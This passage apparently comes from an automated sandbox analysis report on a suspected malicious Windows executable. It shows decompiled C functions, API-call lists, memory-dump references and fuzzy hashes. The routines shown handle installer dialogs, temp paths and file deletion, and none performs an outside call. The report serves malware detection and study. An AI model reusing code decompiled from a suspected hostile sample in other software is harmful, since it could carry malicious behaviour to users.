                                                                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 00402782
                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 0040279A
                                                                                                                                                                            • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 004027AE
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1199265707.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000002.00000002.1199203612.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199348328.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199395587.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199504236.0000000000414000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199619601.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199666920.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199710810.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199764798.0000000000436000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199807226.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199847230.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2667972263-0
                                                                                                                                                                            • Opcode ID: 39fbd17f46fc9c371fd9deabdbb1a4d81bf886de883c9339f90e348bb50c0e41
                                                                                                                                                                            • Instruction ID: 55e8cf3ffad71cabca96213aa966ad8f6b0c6824c0bc9dabfeb9c0d6c9f08848
                                                                                                                                                                            • Opcode Fuzzy Hash: 39fbd17f46fc9c371fd9deabdbb1a4d81bf886de883c9339f90e348bb50c0e41
                                                                                                                                                                            • Instruction Fuzzy Hash: 03217C71800124BBCF216FA5DE89EAE7A79EF09324F14023AF950762D1C7795D418FA9
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                            			E00401CDE(int __edx) {
                                                                                                                                                                            				void* _t17;
                                                                                                                                                                            				struct HINSTANCE__* _t21;
                                                                                                                                                                            				struct HWND__* _t25;
                                                                                                                                                                            				void* _t27;
                                                                                                                                                                            
                                                                                                                                                                            				_t25 = GetDlgItem( *(_t27 - 8), __edx);
                                                                                                                                                                            				GetClientRect(_t25, _t27 - 0x58);
                                                                                                                                                                            				_t17 = SendMessageA(_t25, 0x172, _t21, LoadImageA(_t21, E00402A3A(_t21), _t21,  *(_t27 - 0x50) *  *(_t27 - 0x20),  *(_t27 - 0x4c) *  *(_t27 - 0x20), 0x10));
                                                                                                                                                                            				if(_t17 != _t21) {
                                                                                                                                                                            					DeleteObject(_t17);
                                                                                                                                                                            				}
                                                                                                                                                                            				 *0x423788 =  *0x423788 +  *((intOrPtr*)(_t27 - 4));
                                                                                                                                                                            				return 0;
                                                                                                                                                                            			}







                                                                                                                                                                            0x00401ce8
                                                                                                                                                                            0x00401cef
                                                                                                                                                                            0x00401d1e
                                                                                                                                                                            0x00401d26
                                                                                                                                                                            0x00401d2d
                                                                                                                                                                            0x00401d2d
                                                                                                                                                                            0x004028d2
                                                                                                                                                                            0x004028de

                                                                                                                                                                            APIs
                                                                                                                                                                            • GetDlgItem.USER32(?), ref: 00401CE2
                                                                                                                                                                            • GetClientRect.USER32(00000000,?), ref: 00401CEF
                                                                                                                                                                            • LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401D10
                                                                                                                                                                            • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D1E
                                                                                                                                                                            • DeleteObject.GDI32(00000000), ref: 00401D2D
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1199265707.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000002.00000002.1199203612.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199348328.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199395587.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199504236.0000000000414000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199619601.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199666920.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199710810.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199764798.0000000000436000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199807226.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199847230.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1849352358-0
                                                                                                                                                                            • Opcode ID: 402adc48c185e678c0eab13fcd9adc41762ceb24662fb25a5471487454e9d394
                                                                                                                                                                            • Instruction ID: 14b9f5ff68e8b0ed0f2204d74c17d06140583eb6ed2bbf798243b331d3a4cd3b
                                                                                                                                                                            • Opcode Fuzzy Hash: 402adc48c185e678c0eab13fcd9adc41762ceb24662fb25a5471487454e9d394
                                                                                                                                                                            • Instruction Fuzzy Hash: A9F0E7B2A04114AFEB01ABE4DE88DAFB7BDEB54305B10447AF602F6191C7789D018B79
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 77%
                                                                                                                                                                            			E004046D3(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
                                                                                                                                                                            				char _v36;
                                                                                                                                                                            				char _v68;
                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                            				void* __edi;
                                                                                                                                                                            				void* __esi;
                                                                                                                                                                            				signed int _t21;
                                                                                                                                                                            				signed int _t22;
                                                                                                                                                                            				void* _t29;
                                                                                                                                                                            				void* _t31;
                                                                                                                                                                            				void* _t32;
                                                                                                                                                                            				void* _t41;
                                                                                                                                                                            				signed int _t43;
                                                                                                                                                                            				signed int _t47;
                                                                                                                                                                            				signed int _t50;
                                                                                                                                                                            				signed int _t51;
                                                                                                                                                                            				signed int _t53;
                                                                                                                                                                            
                                                                                                                                                                            				_t21 = _a16;
                                                                                                                                                                            				_t51 = _a12;
                                                                                                                                                                            				_t41 = 0xffffffdc;
                                                                                                                                                                            				if(_t21 == 0) {
                                                                                                                                                                            					_push(0x14);
                                                                                                                                                                            					_pop(0);
                                                                                                                                                                            					_t22 = _t51;
                                                                                                                                                                            					if(_t51 < 0x100000) {
                                                                                                                                                                            						_push(0xa);
                                                                                                                                                                            						_pop(0);
                                                                                                                                                                            						_t41 = 0xffffffdd;
                                                                                                                                                                            					}
                                                                                                                                                                            					if(_t51 < 0x400) {
                                                                                                                                                                            						_t41 = 0xffffffde;
                                                                                                                                                                            					}
                                                                                                                                                                            					if(_t51 < 0xffff3333) {
                                                                                                                                                                            						_t50 = 0x14;
                                                                                                                                                                            						asm("cdq");
                                                                                                                                                                            						_t22 = 1 / _t50 + _t51;
                                                                                                                                                                            					}
                                                                                                                                                                            					_t23 = _t22 & 0x00ffffff;
                                                                                                                                                                            					_t53 = _t22 >> 0;
                                                                                                                                                                            					_t43 = 0xa;
                                                                                                                                                                            					_t47 = ((_t22 & 0x00ffffff) + _t23 * 4 + (_t22 & 0x00ffffff) + _t23 * 4 >> 0) % _t43;
                                                                                                                                                                            				} else {
                                                                                                                                                                            					_t53 = (_t21 << 0x00000020 | _t51) >> 0x14;
                                                                                                                                                                            					_t47 = 0;
                                                                                                                                                                            				}
                                                                                                                                                                            				_t29 = E00405D1B(_t41, _t47, _t53,  &_v36, 0xffffffdf);
                                                                                                                                                                            				_t31 = E00405D1B(_t41, _t47, _t53,  &_v68, _t41);
                                                                                                                                                                            				_t32 = E00405D1B(_t41, _t47, 0x41fd08, 0x41fd08, _a8);
                                                                                                                                                                            				wsprintfA(_t32 + lstrlenA(0x41fd08), "%u.%u%s%s", _t53, _t47, _t31, _t29);
                                                                                                                                                                            				return SetDlgItemTextA( *0x422ed8, _a4, 0x41fd08);
                                                                                                                                                                            			}



















                                                                                                                                                                            0x004046d9
                                                                                                                                                                            0x004046de
                                                                                                                                                                            0x004046e6
                                                                                                                                                                            0x004046e7
                                                                                                                                                                            0x004046f4
                                                                                                                                                                            0x004046fc
                                                                                                                                                                            0x004046fd
                                                                                                                                                                            0x004046ff
                                                                                                                                                                            0x00404701
                                                                                                                                                                            0x00404703
                                                                                                                                                                            0x00404706
                                                                                                                                                                            0x00404706
                                                                                                                                                                            0x0040470d
                                                                                                                                                                            0x00404713
                                                                                                                                                                            0x00404713
                                                                                                                                                                            0x0040471a
                                                                                                                                                                            0x00404721
                                                                                                                                                                            0x00404724
                                                                                                                                                                            0x00404727
                                                                                                                                                                            0x00404727
                                                                                                                                                                            0x0040472b
                                                                                                                                                                            0x0040473b
                                                                                                                                                                            0x0040473d
                                                                                                                                                                            0x00404740
                                                                                                                                                                            0x004046e9
                                                                                                                                                                            0x004046e9
                                                                                                                                                                            0x004046f0
                                                                                                                                                                            0x004046f0
                                                                                                                                                                            0x00404748
                                                                                                                                                                            0x00404753
                                                                                                                                                                            0x00404769
                                                                                                                                                                            0x00404779
                                                                                                                                                                            0x00404795

                                                                                                                                                                            APIs
                                                                                                                                                                            • lstrlenA.KERNEL32(0041FD08,0041FD08,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004045EE,000000DF,00000000,00000400,?), ref: 00404771
                                                                                                                                                                            • wsprintfA.USER32 ref: 00404779
                                                                                                                                                                            • SetDlgItemTextA.USER32(?,0041FD08), ref: 0040478C
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1199265707.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000002.00000002.1199203612.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199348328.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199395587.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199504236.0000000000414000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199619601.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199666920.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199710810.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199764798.0000000000436000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199807226.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199847230.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ItemTextlstrlenwsprintf
                                                                                                                                                                            • String ID: %u.%u%s%s
                                                                                                                                                                            • API String ID: 3540041739-3551169577
                                                                                                                                                                            • Opcode ID: bbe280539c3cc3020c43bf789c637de2f8d0099704e891219e4d784778b6cf22
                                                                                                                                                                            • Instruction ID: 079308417c3a62341de1df324b483ce4e469374b9790fc4fe8de96a48b85a08e
                                                                                                                                                                            • Opcode Fuzzy Hash: bbe280539c3cc3020c43bf789c637de2f8d0099704e891219e4d784778b6cf22
                                                                                                                                                                            • Instruction Fuzzy Hash: F011A573A0412837EB0065699C45EAF3298DB86374F254637FA25F71D2EA788C5245A8
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                            			E0040393E(void* __ecx, void* __eflags) {
                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                            				void* __edi;
                                                                                                                                                                            				void* __esi;
                                                                                                                                                                            				signed short _t6;
                                                                                                                                                                            				intOrPtr _t11;
                                                                                                                                                                            				signed int _t13;
                                                                                                                                                                            				signed int _t16;
                                                                                                                                                                            				signed short* _t18;
                                                                                                                                                                            				signed int _t20;
                                                                                                                                                                            				signed short* _t23;
                                                                                                                                                                            				intOrPtr _t25;
                                                                                                                                                                            				signed int _t26;
                                                                                                                                                                            				intOrPtr* _t27;
                                                                                                                                                                            
                                                                                                                                                                            				_t24 = "1033";
                                                                                                                                                                            				_t13 = 0xffff;
                                                                                                                                                                            				_t6 = E00405C70(__ecx, "1033");
                                                                                                                                                                            				while(1) {
                                                                                                                                                                            					_t26 =  *0x423744;
                                                                                                                                                                            					if(_t26 == 0) {
                                                                                                                                                                            						goto L7;
                                                                                                                                                                            					}
                                                                                                                                                                            					_t16 =  *( *0x423710 + 0x64);
                                                                                                                                                                            					_t20 =  ~_t16;
                                                                                                                                                                            					_t18 = _t16 * _t26 +  *0x423740;
                                                                                                                                                                            					while(1) {
                                                                                                                                                                            						_t18 = _t18 + _t20;
                                                                                                                                                                            						_t26 = _t26 - 1;
                                                                                                                                                                            						if((( *_t18 ^ _t6) & _t13) == 0) {
                                                                                                                                                                            							break;
                                                                                                                                                                            						}
                                                                                                                                                                            						if(_t26 != 0) {
                                                                                                                                                                            							continue;
                                                                                                                                                                            						}
                                                                                                                                                                            						goto L7;
                                                                                                                                                                            					}
                                                                                                                                                                            					 *0x422ee0 = _t18[1];
                                                                                                                                                                            					 *0x4237a8 = _t18[3];
                                                                                                                                                                            					_t23 =  &(_t18[5]);
                                                                                                                                                                            					if(_t23 != 0) {
                                                                                                                                                                            						 *0x422edc = _t23;
                                                                                                                                                                            						E00405C57(_t24,  *_t18 & 0x0000ffff);
                                                                                                                                                                            						SetWindowTextA( *0x41fce8, E00405D1B(_t13, _t24, _t26, 0x422f00, 0xfffffffe));
                                                                                                                                                                            						_t11 =  *0x42372c;
                                                                                                                                                                            						_t27 =  *0x423728;
                                                                                                                                                                            						if(_t11 == 0) {
                                                                                                                                                                            							L15:
                                                                                                                                                                            							return _t11;
                                                                                                                                                                            						}
                                                                                                                                                                            						_t25 = _t11;
                                                                                                                                                                            						do {
                                                                                                                                                                            							_t11 =  *_t27;
                                                                                                                                                                            							if(_t11 != 0) {
                                                                                                                                                                            								_t11 = E00405D1B(_t13, _t25, _t27, _t27 + 0x18, _t11);
                                                                                                                                                                            							}
                                                                                                                                                                            							_t27 = _t27 + 0x418;
                                                                                                                                                                            							_t25 = _t25 - 1;
                                                                                                                                                                            						} while (_t25 != 0);
                                                                                                                                                                            						goto L15;
                                                                                                                                                                            					}
                                                                                                                                                                            					L7:
                                                                                                                                                                            					if(_t13 != 0xffff) {
                                                                                                                                                                            						_t13 = 0;
                                                                                                                                                                            					} else {
                                                                                                                                                                            						_t13 = 0x3ff;
                                                                                                                                                                            					}
                                                                                                                                                                            				}
                                                                                                                                                                            			}
















                                                                                                                                                                            0x00403942
                                                                                                                                                                            0x00403947
                                                                                                                                                                            0x0040394d
                                                                                                                                                                            0x00403952
                                                                                                                                                                            0x00403952
                                                                                                                                                                            0x0040395a
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00403962
                                                                                                                                                                            0x0040396a
                                                                                                                                                                            0x0040396c
                                                                                                                                                                            0x00403972
                                                                                                                                                                            0x00403972
                                                                                                                                                                            0x00403974
                                                                                                                                                                            0x00403980
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00403984
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00403986
                                                                                                                                                                            0x0040398b
                                                                                                                                                                            0x00403994
                                                                                                                                                                            0x0040399a
                                                                                                                                                                            0x0040399f
                                                                                                                                                                            0x004039b3
                                                                                                                                                                            0x004039be
                                                                                                                                                                            0x004039d6
                                                                                                                                                                            0x004039dc
                                                                                                                                                                            0x004039e1
                                                                                                                                                                            0x004039e9
                                                                                                                                                                            0x00403a0a
                                                                                                                                                                            0x00403a0a
                                                                                                                                                                            0x00403a0a
                                                                                                                                                                            0x004039eb
                                                                                                                                                                            0x004039ed
                                                                                                                                                                            0x004039ed
                                                                                                                                                                            0x004039f1
                                                                                                                                                                            0x004039f8
                                                                                                                                                                            0x004039f8
                                                                                                                                                                            0x004039fd
                                                                                                                                                                            0x00403a03
                                                                                                                                                                            0x00403a03
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x004039ed
                                                                                                                                                                            0x004039a1
                                                                                                                                                                            0x004039a6
                                                                                                                                                                            0x004039af
                                                                                                                                                                            0x004039a8
                                                                                                                                                                            0x004039a8
                                                                                                                                                                            0x004039a8
                                                                                                                                                                            0x004039a6

                                                                                                                                                                            APIs
                                                                                                                                                                            • SetWindowTextA.USER32(00000000,00422F00), ref: 004039D6
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1199265707.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000002.00000002.1199203612.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199348328.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199395587.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199504236.0000000000414000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199619601.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199666920.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199710810.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199764798.0000000000436000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199807226.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199847230.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: TextWindow
                                                                                                                                                                            • String ID: "C:\Users\user\Desktop\Jjfmcz1Hsz.exe"$1033$tp
                                                                                                                                                                            • API String ID: 530164218-37664471
                                                                                                                                                                            • Opcode ID: 486f1793fc8ee117fab60480f2aa26aac85a5ca9132015367b3694c6ae5d67fc
                                                                                                                                                                            • Instruction ID: 79edc1b1becbb318b5d11430581b7fe373163fbdb48c995140def98ab9010f1e
                                                                                                                                                                            • Opcode Fuzzy Hash: 486f1793fc8ee117fab60480f2aa26aac85a5ca9132015367b3694c6ae5d67fc
                                                                                                                                                                            • Instruction Fuzzy Hash: B311F3F1B04611ABCB20DF14DD809737BADEBC4756328823FE941A73A0C67D9D029B98
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                            			E0040576B(CHAR* _a4) {
                                                                                                                                                                            				CHAR* _t7;
                                                                                                                                                                            
                                                                                                                                                                            				_t7 = _a4;
                                                                                                                                                                            				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
                                                                                                                                                                            					lstrcatA(_t7, 0x409014);
                                                                                                                                                                            				}
                                                                                                                                                                            				return _t7;
                                                                                                                                                                            			}




                                                                                                                                                                            0x0040576c
                                                                                                                                                                            0x00405783
                                                                                                                                                                            0x0040578b
                                                                                                                                                                            0x0040578b
                                                                                                                                                                            0x00405793

                                                                                                                                                                            APIs
                                                                                                                                                                            • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004030C6,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032C9), ref: 00405771
                                                                                                                                                                            • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004030C6,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032C9), ref: 0040577A
                                                                                                                                                                            • lstrcatA.KERNEL32(?,00409014), ref: 0040578B
                                                                                                                                                                            Strings
                                                                                                                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 0040576B
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1199265707.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000002.00000002.1199203612.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199348328.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199395587.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199504236.0000000000414000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199619601.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199666920.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199710810.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199764798.0000000000436000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199807226.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199847230.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CharPrevlstrcatlstrlen
                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                            • API String ID: 2659869361-3355392842
                                                                                                                                                                            • Opcode ID: 39623dee3265ed167cf4eb0d952b1efefe5673d98ca6e2622bb109ae9f6b3ea7
                                                                                                                                                                            • Instruction ID: 00e6a1abdfef3fccf4d12e3b382aa79108487555f8088e95eeaee7bf5793dfbe
                                                                                                                                                                            • Opcode Fuzzy Hash: 39623dee3265ed167cf4eb0d952b1efefe5673d98ca6e2622bb109ae9f6b3ea7
                                                                                                                                                                            • Instruction Fuzzy Hash: 94D0A9B2A05A307AD3122715AC0DE8B2A08CF82300B094023F200B72A2CB3C1D418BFE
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                            			E00405804(CHAR* _a4) {
                                                                                                                                                                            				CHAR* _t5;
                                                                                                                                                                            				char* _t7;
                                                                                                                                                                            				CHAR* _t9;
                                                                                                                                                                            				char _t10;
                                                                                                                                                                            				CHAR* _t11;
                                                                                                                                                                            				void* _t13;
                                                                                                                                                                            
                                                                                                                                                                            				_t11 = _a4;
                                                                                                                                                                            				_t9 = CharNextA(_t11);
                                                                                                                                                                            				_t5 = CharNextA(_t9);
                                                                                                                                                                            				_t10 =  *_t11;
                                                                                                                                                                            				if(_t10 == 0 ||  *_t9 != 0x3a || _t9[1] != 0x5c) {
                                                                                                                                                                            					if(_t10 != 0x5c || _t11[1] != _t10) {
                                                                                                                                                                            						L10:
                                                                                                                                                                            						return 0;
                                                                                                                                                                            					} else {
                                                                                                                                                                            						_t13 = 2;
                                                                                                                                                                            						while(1) {
                                                                                                                                                                            							_t13 = _t13 - 1;
                                                                                                                                                                            							_t7 = E00405796(_t5, 0x5c);
                                                                                                                                                                            							if( *_t7 == 0) {
                                                                                                                                                                            								goto L10;
                                                                                                                                                                            							}
                                                                                                                                                                            							_t5 = _t7 + 1;
                                                                                                                                                                            							if(_t13 != 0) {
                                                                                                                                                                            								continue;
                                                                                                                                                                            							}
                                                                                                                                                                            							return _t5;
                                                                                                                                                                            						}
                                                                                                                                                                            						goto L10;
                                                                                                                                                                            					}
                                                                                                                                                                            				} else {
                                                                                                                                                                            					return CharNextA(_t5);
                                                                                                                                                                            				}
                                                                                                                                                                            			}









                                                                                                                                                                            0x0040580d
                                                                                                                                                                            0x00405814
                                                                                                                                                                            0x00405817
                                                                                                                                                                            0x00405819
                                                                                                                                                                            0x0040581d
                                                                                                                                                                            0x00405832
                                                                                                                                                                            0x00405851
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00405839
                                                                                                                                                                            0x0040583b
                                                                                                                                                                            0x0040583c
                                                                                                                                                                            0x0040583f
                                                                                                                                                                            0x00405840
                                                                                                                                                                            0x00405848
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x0040584a
                                                                                                                                                                            0x0040584d
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x0040584d
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x0040583c
                                                                                                                                                                            0x0040582a
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x0040582b

                                                                                                                                                                            APIs
                                                                                                                                                                            • CharNextA.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsl1543.tmp,?,00405870,C:\Users\user\AppData\Local\Temp\nsl1543.tmp,C:\Users\user\AppData\Local\Temp\nsl1543.tmp,76803410,?,C:\Users\user\AppData\Local\Temp\,004055BB,?,76803410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405812
                                                                                                                                                                            • CharNextA.USER32(00000000), ref: 00405817
                                                                                                                                                                            • CharNextA.USER32(00000000), ref: 0040582B
                                                                                                                                                                            Strings
                                                                                                                                                                            • C:\Users\user\AppData\Local\Temp\nsl1543.tmp, xrefs: 00405805
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1199265707.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000002.00000002.1199203612.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199348328.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199395587.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199504236.0000000000414000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199619601.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199666920.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199710810.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199764798.0000000000436000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199807226.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199847230.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Similarity
